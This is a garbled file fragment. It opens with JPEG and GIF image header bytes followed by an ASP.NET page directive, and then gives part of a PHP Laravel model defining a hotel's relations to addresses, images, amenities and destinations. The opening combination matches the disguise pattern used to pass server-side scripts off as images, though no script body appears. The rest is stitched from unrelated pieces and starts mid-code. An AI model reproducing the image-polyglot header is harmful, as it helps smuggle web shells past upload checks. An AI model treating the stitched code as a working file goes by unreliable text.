ÿØÿà JFIF ÿÛ C $.' ",#(7),01444'9=82<.342ÿÛ C 2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %>
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
hasOne(HotelAddress::class);
}
/**
* Get the images for this hotel.
*/
public function images(): HasMany
{
return $this->hasMany(HotelImage::class);
}
/**
* Get the amenities for this hotel.
*/
public function amenities(): BelongsToMany
{
return $this->belongsToMany(Amenity::class, 'hotel_facilities', 'hotel_id', 'facility_id');
}
/**
* Get the reviews for this hotel.
*/
// public function reviews(): HasMany
// {
// return $this->hasMany(Review::class);
// }
/**
* Get the amenities for this hotel.
*/
public function destination(): BelongsTo
{
return $this->belongsTo(Destination::class, 'destination_id', 'destination_id');
}
}